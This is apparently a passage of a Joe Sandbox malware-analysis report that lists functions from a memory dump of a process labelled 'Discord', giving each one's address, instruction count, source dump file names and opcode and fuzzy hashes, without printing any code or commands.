Instruction Fuzzy Hash: 4AA002BDC08A445EC6157F2C554253879616990108FDB0AEDC98806357FB3A926846A7

Uniqueness

Uniqueness Score: -1.00%

Function 6DE986E4 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcacf0228b18fc244e39b400f01730ce5955e2953ba1dfd9a2789cbe5cdaa431
Instruction ID: 3256545ed120a91e4c13879a123be5d11e4745b9972d8ccb5cd36707e08ecfc1
Opcode Fuzzy Hash: dcacf0228b18fc244e39b400f01730ce5955e2953ba1dfd9a2789cbe5cdaa431
Instruction Fuzzy Hash: 70718E3240ABD79BC7169E3095E2733BF68FA0331873411BBC9A99E173D950A412D7E6

Uniqueness

Uniqueness Score: -1.00%

Function 6DE9870C Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0ee847e211fa21ae5ead26bba1a70fc3dcd0852b90c6af731625a7640ff510
Instruction ID: f0ea6c2edf9126d7f1c62c73a15c8ce67bef8bdea2a4fcd4db816b37760906ab
Opcode Fuzzy Hash: 0f0ee847e211fa21ae5ead26bba1a70fc3dcd0852b90c6af731625a7640ff510
Instruction Fuzzy Hash: CE619B6240BBD39AC7165E3095E2733BF68F90331873401ABC9A99E173DA10A422C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 6DE98740 Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5614c47a7237ed0ec97596ed9c2511da9f167f9a117529f7f8318931bca28a7
Instruction ID: e7035d7a8d9a3d27b2dae25057129f4ba4bd6e07d59cf00685f6de84637b9869
Opcode Fuzzy Hash: f5614c47a7237ed0ec97596ed9c2511da9f167f9a117529f7f8318931bca28a7
Instruction Fuzzy Hash: 34519C6240BBD7ABC7165E3095D2733BF68F90331873411AFC9A95E173DA50A422C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 6DE98780 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 994ec5bace5abc503f027643089fd9651386fec004b3b65ef40ce10aecb275f7
Instruction ID: 4015862432e5d7e54edb4d51c6251a9ddf4bcb084bd70832e5a559b238dc4c2d
Opcode Fuzzy Hash: 994ec5bace5abc503f027643089fd9651386fec004b3b65ef40ce10aecb275f7
Instruction Fuzzy Hash: 0651AC7240AF87ABC7165E3095E2623BF68F90335477401AFC9694D177DA209022C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 6DE987C0 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 583ac79724c9dcd5fb5495543828940fe7debfdec528733217057a416e039144
Instruction ID: d6219b6c64803fada6cd8789483242c0316383daa2aeb9b7c9a1523449ff23ae
Opcode Fuzzy Hash: 583ac79724c9dcd5fb5495543828940fe7debfdec528733217057a416e039144
Instruction Fuzzy Hash: 84519B61406F83EAC7169E3495D2623BF78FA1231477401BFC9680D177EA209422C7E7

Uniqueness

Uniqueness Score: -1.00%

Function 6DE98840 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81247b65b625969a4670e41aab4e3b368931d39baeb24e014f9cd690320827fa
Instruction ID: ecf99a8bb37b1df2178738766221cc43e8b34e9b73f0dd1777d4772ea497cc89
Opcode Fuzzy Hash: 81247b65b625969a4670e41aab4e3b368931d39baeb24e014f9cd690320827fa
Instruction Fuzzy Hash: D131CD62406F97ABC7128E3499D2637BF78F903324734126BC5AD1D177DA20A022C3E7

Uniqueness

Uniqueness Score: -1.00%

Function 6DE98880 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 363856b364ab7be0d822ea7e0bf8c84556ab2041f73bb0ffd12a92457d1dbea9
Instruction ID: 4525e4c6e130ac15dc84598c5a1707c7db312e29cb40afbc690e4fdcf42257c6
Opcode Fuzzy Hash: 363856b364ab7be0d822ea7e0bf8c84556ab2041f73bb0ffd12a92457d1dbea9
Instruction Fuzzy Hash: B031CC61406F97AAC3128E70D5D2633BF6CFA03368734112BC56D1D273EA60A422C3E7

Uniqueness

Uniqueness Score: -1.00%

Function 6DE9A7FC Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f8f7fb7190efcae8f90fd3b513787313ed388fa0005cde07be7253a00274995
Instruction ID: a5e5fcdb40fd7e580be9a7a55c443bc9a1bab2e1fcf607c9f4df9ce2afdf48e1
Opcode Fuzzy Hash: 8f8f7fb7190efcae8f90fd3b513787313ed388fa0005cde07be7253a00274995
Instruction Fuzzy Hash: 5F31ACDD54A2D636CF539A38E9788C7AF20DE62270E58C8CDF8C49E803E054D30AC722

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94DB0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c87f0ea2cee138d9532997cdca361996f2ce0f1b955d4c995f621cfdf58da15f
Instruction ID: 0441de3f3dcd990930f68710184357b8b016d669282e8116c316642c28afeb27
Opcode Fuzzy Hash: c87f0ea2cee138d9532997cdca361996f2ce0f1b955d4c995f621cfdf58da15f
Instruction Fuzzy Hash: 54E04F346122018FDB019F35E8D9A1477A4AF4922F76C80A9D91C5F326CB32E85DCB52

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94D10 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c87f0ea2cee138d9532997cdca361996f2ce0f1b955d4c995f621cfdf58da15f
Instruction ID: ad1a3cf6ea3c452e0f74768c02d3949a7f945749b1ad50fb0625587893db5b11
Opcode Fuzzy Hash: c87f0ea2cee138d9532997cdca361996f2ce0f1b955d4c995f621cfdf58da15f
Instruction Fuzzy Hash: 2AE04F346122058FDB018F35E8D961477A4AF0921F76D84A9D91C5F326CA32D85DCB52

Uniqueness

Uniqueness Score: -1.00%

Function 6DE98A18 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a29afa5f77b24890e5a541383df25cc37119865d3e1d4c41aec141e3d58534
Instruction ID: 20905e66151b7f9d11be17e313f235223d576d2aadefba44446387ea67d6455e
Opcode Fuzzy Hash: 72a29afa5f77b24890e5a541383df25cc37119865d3e1d4c41aec141e3d58534
Instruction Fuzzy Hash: 24B0924411EFD18CC6236A350825811BF3208030A0B4A02CA80D2C91F3C0048818C323

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94C50 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 774ec89c2651ba36219470d2db639ee6d5a4e6c5a698394394d2b70b8fb22a61
Instruction ID: b06fc693e614ebd2ff98d21890db444c6a5c01aab97260ee9b2eac86a47217ae
Opcode Fuzzy Hash: 774ec89c2651ba36219470d2db639ee6d5a4e6c5a698394394d2b70b8fb22a61
Instruction Fuzzy Hash: 05B00139354000CF9389CB08C494C90F3B0EB19224329C89AEC1ACB762D732ED0BCA00

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94BE0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 774ec89c2651ba36219470d2db639ee6d5a4e6c5a698394394d2b70b8fb22a61
Instruction ID: b06fc693e614ebd2ff98d21890db444c6a5c01aab97260ee9b2eac86a47217ae
Opcode Fuzzy Hash: 774ec89c2651ba36219470d2db639ee6d5a4e6c5a698394394d2b70b8fb22a61
Instruction Fuzzy Hash: 05B00139354000CF9389CB08C494C90F3B0EB19224329C89AEC1ACB762D732ED0BCA00

Uniqueness

Uniqueness Score: -1.00%

Function 6DE989E0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3af7869901185549cb44c06818dad89df48ba5c83daa6312e6f50bf6672ed16f
Instruction ID: 71106d4faefd006164bec5d1b4f0293417bf9d67867b063e7c421c3e9cb489cd
Opcode Fuzzy Hash: 3af7869901185549cb44c06818dad89df48ba5c83daa6312e6f50bf6672ed16f
Instruction Fuzzy Hash: 4EB01108A0E3C08EC303AB2088200802F322C0320030A28CB808ACF0ABE000880CC3AA

Uniqueness

Uniqueness Score: -1.00%

Function 6DE989F8 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f0d740343e17722a91e25cab82b85180549abbb7307ef3a6800f5a3c2fd902f
Instruction ID: 16621664d8208c5d306ee8fc17acd633a9d972f6f3fdb9d2a4fa32d90bb359e2
Opcode Fuzzy Hash: 3f0d740343e17722a91e25cab82b85180549abbb7307ef3a6800f5a3c2fd902f
Instruction Fuzzy Hash: 9FA0024505E3C48FC317576048605C42F74081301070A00C3C09ACB1A3C0040949CB33

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94D50 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c77d4b0187149734d6929d2ae0c8fd0a220f20b5de5f3f3f524500aa82536e5
Instruction ID: dbb1f6115d7f005cfe44b72716f1a005be0a5ae37c787cf891a4ae8d6f29b861
Opcode Fuzzy Hash: 9c77d4b0187149734d6929d2ae0c8fd0a220f20b5de5f3f3f524500aa82536e5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94CB0 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c77d4b0187149734d6929d2ae0c8fd0a220f20b5de5f3f3f524500aa82536e5
Instruction ID: dbb1f6115d7f005cfe44b72716f1a005be0a5ae37c787cf891a4ae8d6f29b861
Opcode Fuzzy Hash: 9c77d4b0187149734d6929d2ae0c8fd0a220f20b5de5f3f3f524500aa82536e5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6DE986C0 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65fc67797c99c67bfb4617c4311f943700539315b586dfd6710616dd02f97ff5
Instruction ID: 9f98e600b15138ed4f66b607ac2a1e4db981c84ff2777242be6ce92c5d0dedd2
Opcode Fuzzy Hash: 65fc67797c99c67bfb4617c4311f943700539315b586dfd6710616dd02f97ff5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6DE986B4 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c485af9924842d47d3439e8cfb5cb97a85d9c656e33428b186c037f061709633
Instruction ID: 388c6901a817f865aaf32d16b5add541025ef29f39f888e77a587b0e01aed2a2
Opcode Fuzzy Hash: c485af9924842d47d3439e8cfb5cb97a85d9c656e33428b186c037f061709633
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6DE9868C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmpDownload File
